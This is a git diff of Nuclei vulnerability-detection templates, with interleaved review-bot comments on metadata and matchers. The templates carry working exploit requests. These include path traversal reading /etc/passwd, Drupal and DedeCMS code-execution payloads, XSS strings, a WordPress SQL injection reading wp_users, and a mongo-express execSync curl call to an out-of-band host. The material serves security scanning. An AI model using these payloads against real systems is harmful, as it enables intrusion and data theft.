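Review bot: The second word matcher in cve-2018-3810.yaml has `words: - ''`, an empty string that every response body contains, so the only effective conditions are `text/html` and status 200 and the template flags any WordPress site that answers the POST; if the intended marker was lost in rendering it must be restored, otherwise the matcher has nothing to match. The POST itself sends `sgcgoogleanalytic=&sgcwebtools=` with `action=savegooglecode`, which on a vulnerable site overwrites the plugin's stored settings with empty values — a destructive side effect the `description` should state, e.g. `# state-changing: the POST blanks the plugin's saved code on a vulnerable site`. The template also uses the legacy `requests:` key and no `metadata`/`max-request`, while the commit migrates other files to `http:` (cve-2018-7602, cve-2018-7662, CVE-2019-10405); the same applies to cve-2018-7490.yaml, cve-2018-7700.yaml, cve-2018-8727.yaml and CVE-2019-11043.yaml added here.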
diff --git a/nuclei-templates/CVE-2018/CVE-2018-5233.yaml b/nuclei-templates/CVE-2018/cve-2018-5233.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-5233.yaml rename to nuclei-templates/CVE-2018/cve-2018-5233.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7490.yaml b/nuclei-templates/CVE-2018/cve-2018-7490.yaml new file mode 100644 index 0000000000..d77d8d8251 --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7490.yaml @@ -0,0 +1,32 @@ +id: CVE-2018-7490 + +info: + name: uWSGI PHP Plugin Directory Traversal + author: madrobot + severity: high + tags: cve,cve2018,uwsgi,php,lfi,plugin + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2018-7490 + cwe-id: CWE-22 + description: "uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal." + reference: + - https://uwsgi-docs.readthedocs.io/en/latest/Changelog-2.0.17.html + - https://www.exploit-db.com/exploits/44223/ + - https://www.debian.org/security/2018/dsa-4142 + +requests: + - method: GET + path: + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - "root:.*:0:0:" + part: body diff --git a/nuclei-templates/CVE-2018/CVE-2018-7600.yaml b/nuclei-templates/CVE-2018/cve-2018-7600.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-7600.yaml rename to nuclei-templates/CVE-2018/cve-2018-7600.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-7602.yaml b/nuclei-templates/CVE-2018/cve-2018-7602.yaml index 243e590b31..aa1cc6dda2 100644 --- a/nuclei-templates/CVE-2018/cve-2018-7602.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-7602.yaml 
@@ -1,19 +1,35 @@ id: CVE-2018-7602 + info: - name: Drupal Remote Code Execution Vulnerability + name: Drupal - Remote Code Execution author: princechaddha severity: critical - description: A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + description: Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + impact: | + Remote attackers can execute arbitrary code on the affected Drupal installations. + remediation: | + Upgrade to Drupal 7.58, 8.3.9, 8.4.6, or 8.5.1 or apply the necessary patches provided by Drupal. 
reference: - https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7602/drupa7-CVE-2018-7602.py - https://nvd.nist.gov/vuln/detail/CVE-2018-7602 - tags: cve,cve2018,drupal,authenticated + - https://www.drupal.org/sa-core-2018-004 + - https://www.exploit-db.com/exploits/44557/ + - http://www.securitytracker.com/id/1040754 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 + cvss-score: 9.8 cve-id: CVE-2018-7602 + epss-score: 0.97448 + epss-percentile: 0.99947 + cpe: cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* + metadata: + max-request: 4 + vendor: drupal + product: drupal + shodan-query: http.component:"drupal" + tags: cve,cve2018,drupal,authenticated,kev,vulhub,edb -requests: +http: - raw: - | POST /?q=user%2Flogin HTTP/1.1 @@ -21,18 +37,15 @@ requests: Content-Type: application/x-www-form-urlencoded form_id=user_login&name={{username}}&pass={{password}}&op=Log+in - - | GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 Host: {{Hostname}} - - | POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account - - | POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 Host: {{Hostname}} @@ -40,8 +53,7 @@ requests: form_build_id={{form_build_id}} - cookie-reuse: true - redirects: true + host-redirects: true max-redirects: 2 matchers: - type: word 
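Review bot: The new `impact:` block says "Remote attackers can execute arbitrary code", but the template first logs in with `{{username}}`/`{{password}}`, carries the `authenticated` tag and drives `form_id=user_cancel_confirm_form`, so the path exercised here needs a valid account that can reach the account-cancel form. Suggest `impact: | An authenticated user who can reach the account-cancel form can execute arbitrary code on the server.` so the text matches the requests. The later hunks of this file also drop `cookie-reuse: true`; if the nuclei version targeted does not default to cookie reuse for raw multi-request templates, the login session would not carry into the later requests, which is worth confirming.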
@@ -50,25 +62,26 @@ requests: extractors: - type: regex - part: body name: userid - internal: true group: 1 regex: - '' + internal: true + part: body - type: regex - part: body name: form_build_id - internal: true group: 1 regex: - '' + internal: true + part: body +# digest: 4a0a0047304502204dec12f369a9044e8dc3ba9c641723199442f60a3736e83f89caca37cd8118b5022100cda38fa6e52e8717c3073dff9123fc3707428e477982dd4549e372892f2a082e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2018/cve-2018-7662.yaml b/nuclei-templates/CVE-2018/cve-2018-7662.yaml index eb56470249..4296c733cd 100644 --- a/nuclei-templates/CVE-2018/cve-2018-7662.yaml +++ b/nuclei-templates/CVE-2018/cve-2018-7662.yaml 
@@ -1,25 +1,42 @@ id: CVE-2018-7662 info: - name: CouchCMS Full Path Disclosure + name: CouchCMS <= 2.0 - Path Disclosure author: ritikchaddha severity: medium - description: phpmailer.php and mysql2i.func.php disclosure the full path - reference: https://github.com/CouchCMS/CouchCMS/issues/46 - tags: couchcms,fpd,cve,cve2018 + description: CouchCMS <= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php. + impact: | + An attacker can exploit this vulnerability to gain knowledge of the server's directory structure, potentially aiding in further attacks. + remediation: | + Upgrade to the latest version of CouchCMS (2.1 or higher) to mitigate this vulnerability. + reference: + - https://github.com/CouchCMS/CouchCMS/issues/46 + - https://nvd.nist.gov/vuln/detail/CVE-2018-7662 + - https://github.com/20142995/Goby + - https://github.com/5ecurity/CVE-List + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2018-7662 cwe-id: CWE-200 + epss-score: 0.00292 + epss-percentile: 0.65908 + cpe: cpe:2.3:a:couchcms:couch:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: couchcms + product: couch + tags: cve2018,cve,couchcms,fpd -requests: +http: - method: GET path: - "{{BaseURL}}/includes/mysql2i/mysql2i.func.php" - "{{BaseURL}}/addons/phpmailer/phpmailer.php" stop-at-first-match: true + matchers-condition: or matchers: - type: word @@ -35,3 +52,4 @@ requests: - "phpmailer.php on line 10" - "Fatal error: Call to a menber function add_event_listener() on a non-object in" condition: and +# digest: 490a0046304402207bc6bc4a86c8bf73bc4bc1fe83c3fb63108f1b1b77ac110b33a6af75a7a3a8ad02203036732893f9ba2208c741cd3a825d7d73f9870d11029f0c14d7098e0bc302cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2018/cve-2018-7700.yaml b/nuclei-templates/CVE-2018/cve-2018-7700.yaml new file mode 100644 index 0000000000..32b525bf7f --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-7700.yaml @@ -0,0 +1,33 @@ +id: CVE-2018-7700 + +info: + name: DedeCMS V5.7SP2 RCE + author: pikpikcu + severity: high + reference: https://laworigin.github.io/2018/03/07/CVE-2018-7700-dedecms%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C/ + tags: cve,cve2018,dedecms,rce + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2018-7700 + cwe-id: CWE-352 + description: "DedeCMS 5.7 has CSRF with an impact of arbitrary code execution, because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code." + +requests: + - method: GET + path: + - "{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}phpinfo();{/dede:field}" + + matchers-condition: and + matchers: + + - type: word + words: + - "phpinfo" + - "PHP Version" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-8006.yaml b/nuclei-templates/CVE-2018/cve-2018-8006.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-8006.yaml rename to nuclei-templates/CVE-2018/cve-2018-8006.yaml diff --git a/nuclei-templates/CVE-2018/cve-2018-8727.yaml b/nuclei-templates/CVE-2018/cve-2018-8727.yaml new file mode 100644 index 0000000000..b537efb4ad --- /dev/null +++ b/nuclei-templates/CVE-2018/cve-2018-8727.yaml 
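Review bot: cve-2018-7700.yaml classifies the issue as CWE-352 with `UI:R`, i.e. a CSRF that relies on an administrator's browser session, yet the template issues a plain unauthenticated GET to `tag_test_action.php` with no login step, so what it actually detects is reachability of that endpoint without a session. Either add a login request with the `authenticated` tag, as the DomainMOD templates in this commit do, or state in `description` that a match means the endpoint is exposed without authentication. The request also runs `phpinfo()` on the target, so `# state-changing: executes PHP on the target` above the `requests:` block would tell operators what the scan does.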
@@ -0,0 +1,30 @@ +id: CVE-2018-8727 + +info: + name: Mirasys DVMS Workstation 5.12.6 Path Traversal + author: 0x_akoko + severity: high + description: Mirasys DVMS Workstation versions 5.12.6 and below suffer from a path traversal vulnerability. + reference: + - https://packetstormsecurity.com/files/148266/Mirasys-DVMS-Workstation-5.12.6-Path-Traversal.html + - https://www.cvedetails.com/cve/CVE-2018-8727 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2018-8727 + cwe-id: CWE-22 + tags: cve,cve2018,mirasys,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini" + + matchers: + - type: word + part: body + words: + - "bit app support" + - "fonts" + - "extensions" + condition: and diff --git a/nuclei-templates/CVE-2018/cve-2018-9161.yaml b/nuclei-templates/CVE-2018/cve-2018-9161.yaml deleted file mode 100644 index 5db121e528..0000000000 --- a/nuclei-templates/CVE-2018/cve-2018-9161.yaml +++ /dev/null 
@@ -1,34 +0,0 @@ -id: CVE-2018-9161 - -info: - name: PrismaWEB - Credentials Disclosure - author: gy741 - severity: critical - description: The vulnerability exists due to the disclosure of hard-coded credentials allowing an attacker to effectively bypass authentication of PrismaWEB with administrator privileges. The credentials can be disclosed by simply navigating to the login_par.js JavaScript page that holds the username and password for the management interface that are being used via the Login() function in /scripts/functions_cookie.js script. - reference: - - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5453.php - - https://nvd.nist.gov/vuln/detail/CVE-2018-9161 - tags: cve,cve2018,prismaweb,exposure - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2018-9161 - cwe-id: CWE-798 - -requests: - - method: GET - path: - - "{{BaseURL}}/user/scripts/login_par.js" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'txtChkUser' - - 'txtChkPassword' - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2018/CVE-2018-9845.yaml b/nuclei-templates/CVE-2018/cve-2018-9845.yaml similarity index 100% rename from nuclei-templates/CVE-2018/CVE-2018-9845.yaml rename to nuclei-templates/CVE-2018/cve-2018-9845.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-0193.yaml b/nuclei-templates/CVE-2019/CVE-2019-0193.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0193.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0193.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-0221.yaml b/nuclei-templates/CVE-2019/CVE-2019-0221.yaml index 4bc1cd99b6..d70ad0f864 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-0221.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-0221.yaml 
@@ -1,38 +1,43 @@ id: CVE-2019-0221 + info: name: Apache Tomcat XSS author: pikpikcu severity: medium + reference: + - https://seclists.org/fulldisclosure/2019/May/50 + - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ + - https://www.exploit-db.com/exploits/50119 description: | The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website. - reference: - - https://seclists.org/fulldisclosure/2019/May/50 - - https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/ - - https://www.exploit-db.com/exploits/50119 - - https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@%3Cannounce.tomcat.apache.org%3E + tags: cve,cve2019,apache,xss,tomcat classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2019-0221 cwe-id: CWE-79 - tags: cve,cve2019,apache,xss,tomcat + requests: - method: GET path: - "{{BaseURL}}/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" - "{{BaseURL}}/ssi/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E" + matchers-condition: and matchers: + - type: word words: - "" + - type: word part: header words: - "text/html" + - type: status status: - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-0230.yaml b/nuclei-templates/CVE-2019/CVE-2019-0230.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-0230.yaml rename to nuclei-templates/CVE-2019/CVE-2019-0230.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10098.yaml b/nuclei-templates/CVE-2019/CVE-2019-10098.yaml index 6874b9e1e8..b71e1cd822 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-10098.yaml 
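Review bot: `cvss-score: 6.10` goes the opposite way from the rest of the commit, which normalises scores to one decimal (`9.80`→`9.8` in cve-2018-7602, `5.30`→`5.3` in cve-2018-7662); keep `cvss-score: 6.1`. The hunk also removes the lists.apache.org announce-thread entry, which is the vendor's own advisory, while keeping the third-party links, and the file stays on the legacy `requests:` key with no `metadata`/`max-request` block that the other updated templates gain. Retaining the Apache reference and aligning the file with the `http:` form would make it consistent with the other CVE-2019 updates here.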
+++ b/nuclei-templates/CVE-2019/CVE-2019-10098.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | In Apache HTTP server 2.4.0 to 2.4.39, Redirects configured with mod_rewrite that were intended to be self-referential might be fooled by encoded newlines and redirect instead to an unexpected URL within the request URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Upgrade Apache HTTP server to version 2.4.40 or later to mitigate this vulnerability. reference: @@ -21,7 +23,7 @@ info: cve-id: CVE-2019-10098 cwe-id: CWE-601 epss-score: 0.10593 - epss-percentile: 0.94461 + epss-percentile: 0.94527 cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100fa28d6e933c4a020b46e35b2bcf6d248a2afe81e491e3d75349936ec37ff330702203b9b6c78898a9cb646e032eec281de85172b5de2ba972a9713afa155fa28f2a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d5acc648046711517cfb9e2cf0cdb4c15233662233ff46aef2ea399f5a42f3b02204bbcd1901f2966465782ae4bb1a89811265aa66156c599bfd42c96706453fa92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml b/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml deleted file mode 100644 index b1afc71348..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-1010287.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: CVE-2019-1010287 -info: - name: Timesheet 1.5.3 - Cross Site Scripting - author: pikpikcu - severity: medium - description: 'Timesheet Next Gen 1.5.3 and earlier is affected by: Cross Site Scripting (XSS). The impact is: Allows an attacker to execute arbitrary HTML and JavaScript code via a "redirect" parameter. The component is: Web login form: login.php, lines 40 and 54. The attack vector is: reflected XSS, victim may click the malicious url.' - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 - - http://www.mdh-tz.info/ - - https://sourceforge.net/p/tsheetx/discussion/779083/thread/7fcb52f696/ - - https://sourceforge.net/p/tsheetx/code/497/tree/branches/legacy/login.php#l40 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-1010287 - cwe-id: CWE-79 - metadata: - google-dork: inurl:"/timesheet/login.php" - tags: cve,cve2019,timesheet,xss -requests: - - raw: - - | - POST /timesheet/login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '>' - part: body diff --git a/nuclei-templates/CVE-2019/CVE-2019-10405.yaml b/nuclei-templates/CVE-2019/CVE-2019-10405.yaml index 805745fd9a..94189434f2 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-10405.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-10405.yaml 
@@ -1,22 +1,35 @@ id: CVE-2019-10405 + info: - name: Diagnostic page exposed Cookie HTTP header + name: Jenkins <=2.196 - Cookie Exposure author: c-sh0 severity: medium - description: Jenkins 2.196 and earlier, LTS 2.176.3 and earlier printed the value of the Cookie on the /whoAmI/ URL + description: Jenkins through 2.196, LTS 2.176.3 and earlier prints the value of the cookie on the /whoAmI/ URL despite it being marked HttpOnly, thus making it possible to steal cookie-based authentication credentials if the URL is exposed or accessed via another cross-site scripting issue. + impact: | + The exposure of cookies can lead to session hijacking, unauthorized access, and potential data breaches. + remediation: | + Upgrade Jenkins to a version higher than 2.196 to mitigate the vulnerability. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-10405 - https://jenkins.io/security/advisory/2019-09-25/#SECURITY-1505 - http://www.openwall.com/lists/oss-security/2019/09/25/3 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10405 + - https://github.com/ARPSyndicate/kenzer-templates classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N - cvss-score: 4.3 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 cve-id: CVE-2019-10405 - cwe-id: CWE-200 + cwe-id: CWE-79 + epss-score: 0.00572 + epss-percentile: 0.77427 + cpe: cpe:2.3:a:jenkins:jenkins:*:*:*:*:lts:*:*:* metadata: + max-request: 2 + vendor: jenkins + product: jenkins shodan-query: http.favicon.hash:81586312 tags: cve,cve2019,jenkins -requests: + +http: - raw: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 
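Review bot: The single `cpe:` line now carries `lts` in the software-edition field, so the template only describes the LTS stream, although `name` and `description` cover weekly releases through 2.196 as well; if the entry came from NVD, which appears to list the weekly and LTS streams separately, either add the second CPE or use the wildcard form `cpe:2.3:a:jenkins:jenkins:*:*:*:*:*:*:*:*`. The `cwe-id` change from CWE-200 to CWE-79 and the new `C:L/I:L` vector are not explained by the commit; if they follow NVD's classification a short comment such as `# classification taken from NVD` would stop the next maintainer from reverting them, since the description still reads as an information exposure. CVE-2019-10405.yaml continues in the next hunk.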
@@ -24,27 +37,30 @@ requests: - | GET {{BaseURL}}/whoAmI/ HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true - req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word part: header words: - 'text/html' - 'x-jenkins' - condition: and case-insensitive: true + condition: and + - type: word part: body_2 words: - 'Cookie' - 'JSESSIONID' condition: and + + - type: status + status: + - 200 + extractors: - type: kval kval: - x_jenkins +# digest: 4a0a00473045022100d3c00480594e335316512607e1730e0f4b99e755cd744fc506c049036dbe4696022000afd5caaf07abf1dbe8d051503772a11975ed7d5bd15940e71c63a569ad63bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-10475.yaml b/nuclei-templates/CVE-2019/CVE-2019-10475.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-10475.yaml rename to nuclei-templates/CVE-2019/CVE-2019-10475.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-10692.yaml b/nuclei-templates/CVE-2019/CVE-2019-10692.yaml index 085a48b4e0..66751d09e7 100644 --- a/nuclei-templates/CVE-2019/CVE-2019-10692.yaml +++ b/nuclei-templates/CVE-2019/CVE-2019-10692.yaml 
@@ -1,29 +1,22 @@ id: CVE-2019-10692 - info: - name: WordPress Google Maps <7.11.18 - SQL Injection + name: WP Google Maps < 7.11.18 - Unauthenticated SQL Injection author: pussycat0x severity: critical description: | - WordPress Google Maps plugin before 7.11.18 contains a SQL injection vulnerability. The plugin includes /class.rest-api.php in the REST API and does not sanitize field names before a SELECT statement. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site. + In the wp-google-maps plugin before 7.11.18 for WordPress, + includes/class.rest-api.php in the REST API does not sanitize field names + before a SELECT statement. reference: - https://wpscan.com/vulnerability/475404ce-2a1a-4d15-bf02-df0ea2afdaea - - https://wordpress.org/plugins/wp-google-maps/#developers - - https://plugins.trac.wordpress.org/changeset?old_path=%2Fwp-google-maps&old=2061433&new_path=%2Fwp-google-maps&new=2061434&sfp_email=&sfph_mail=#file755 - https://nvd.nist.gov/vuln/detail/CVE-2019-10692 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2019-10692 - cwe-id: CWE-89 metadata: - verified: "true" - tags: cve,cve2019,wp,wp-plugin,unauth,sqli,wordpress,googlemaps,wpscan + verified: true + tags: cve,cve2019,sqli,wp,wordpress,wp-plugin,unauth,googlemaps requests: - method: GET path: - "{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-" - matchers-condition: and matchers: - type: word @@ -33,14 +26,10 @@ requests: - '"user_pass"' - '"user_nicename"' condition: and - - type: word part: header words: - application/json - - type: status status: - 200 - -# Enhanced by mp on 2022/09/28 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10717.yaml b/nuclei-templates/CVE-2019/CVE-2019-10717.yaml deleted file mode 100644 index 39980665a1..0000000000 
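Review bot: The new side of CVE-2019-10692.yaml deletes the whole `classification:` block (`cvss-metrics`, `cvss-score: 9.8`, `cve-id`, `cwe-id: CWE-89`) together with the plugin changeset reference, which is the reverse of what this commit does to the other templates (they gain classification, epss and metadata fields); unless the removal is intentional, restore the block. The description is now a hard-wrapped block scalar, which is fine, but a `max-request: 1` under `metadata:` would match the other templates' convention. The request still sends an unauthenticated REST query that reads `wp_users`, so the `unauth` tag is accurate and should be kept.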
--- a/nuclei-templates/CVE-2019/CVE-2019-10717.yaml +++ /dev/null @@ -1,43 +0,0 @@ -id: CVE-2019-10717 - -info: - name: BlogEngine.NET 3.3.7.0 - Local File Inclusion - author: arafatansari - severity: high - description: | - BlogEngine.NET 3.3.7.0 allows /api/filemanager local file inclusion via the path parameter - reference: - - https://www.securitymetrics.com/blog/Blogenginenet-Directory-Traversal-Listing-Login-Page-Unvalidated-Redirect - - https://github.com/rxtur/BlogEngine.NET/commits/master - - https://nvd.nist.gov/vuln/detail/CVE-2019-10717 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N - cvss-score: 7.1 - cve-id: CVE-2019-10717 - cwe-id: CWE-22 - metadata: - shodan-query: http.html:"Blogengine.net" - verified: "true" - tags: cve,cve2019,blogengine,lfi,traversal - -requests: - - method: GET - path: - - "{{BaseURL}}/api/filemanager?path=%2F..%2f..%2fContent" - - matchers-condition: and - matchers: - - type: regex - regex: - - '~/App_Data/files/../../([a-zA-Z0-9\.\-]+)/([a-z0-9]+)' - - - type: word - part: header - words: - - "application/json" - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/03 diff --git a/nuclei-templates/CVE-2019/CVE-2019-10758.yaml b/nuclei-templates/CVE-2019/CVE-2019-10758.yaml new file mode 100644 index 0000000000..92d6c6e83f --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-10758.yaml 
@@ -0,0 +1,47 @@ +id: CVE-2019-10758 + +info: + name: mongo-express Remote Code Execution + author: princechaddha + severity: critical + description: mongo-express before 0.54.0 is vulnerable to remote code execution via endpoints that uses the `toBSON` method and misuse the `vm` dependency to perform `exec` commands in a non-safe environment. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. + remediation: Upgrade mongo-express to version 0.54.0 or higher. + reference: + - https://github.com/vulhub/vulhub/tree/master/mongo-express/CVE-2019-10758 + - https://nvd.nist.gov/vuln/detail/CVE-2019-10758 + - https://snyk.io/vuln/SNYK-JS-MONGOEXPRESS-473215 + - https://github.com/CLincat/vulcat + - https://github.com/MelanyRoob/Goby + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H + cvss-score: 9.9 + cve-id: CVE-2019-10758 + epss-score: 0.97429 + epss-percentile: 0.99934 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* + metadata: + max-request: 1 + vendor: mongo-express_project + product: mongo-express + framework: node.js + shodan-query: http.title:"Mongo Express" + tags: cve,cve2019,vulhub,mongo,mongo-express,kev,mongo-express_project,node.js + +http: + - raw: + - | + POST /checkValid HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic YWRtaW46cGFzcw== + Content-Type: application/x-www-form-urlencoded + + document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("curl {{interactsh-url}}") + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" +# digest: 4b0a004830460221008b43b36836d54fe57119d7fbc9c2c7bbf83a5c28c40a75eb6347457778a45bc6022100fe8bb104228123301a28b551a1badd14112e0aa18bce53387295571b79c7b827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
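Review bot: The `Authorization: Basic YWRtaW46cGFzcw==` header in the raw request hard-codes a single credential pair, whereas the other multi-step templates in this patch (CVE-2019-14530, CVE-2019-14750) take `{{username}}`/`{{password}}` from the command line; `Authorization: Basic {{base64(username + ':' + password)}}` with a sentence in `description` noting the default would let operators scan instances whose password was changed. The `classification` block has `cvss-metrics`, `cvss-score`, `cve-id` and EPSS values but no `cwe-id`, unlike the neighbouring templates; take it from the NVD record already listed under `reference`. The matcher accepts any `http` interaction on `interactsh_protocol`, which is appropriate for an OAST check, yet `tags` lacks `oast` while the Citrix templates updated in this same commit gain it.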
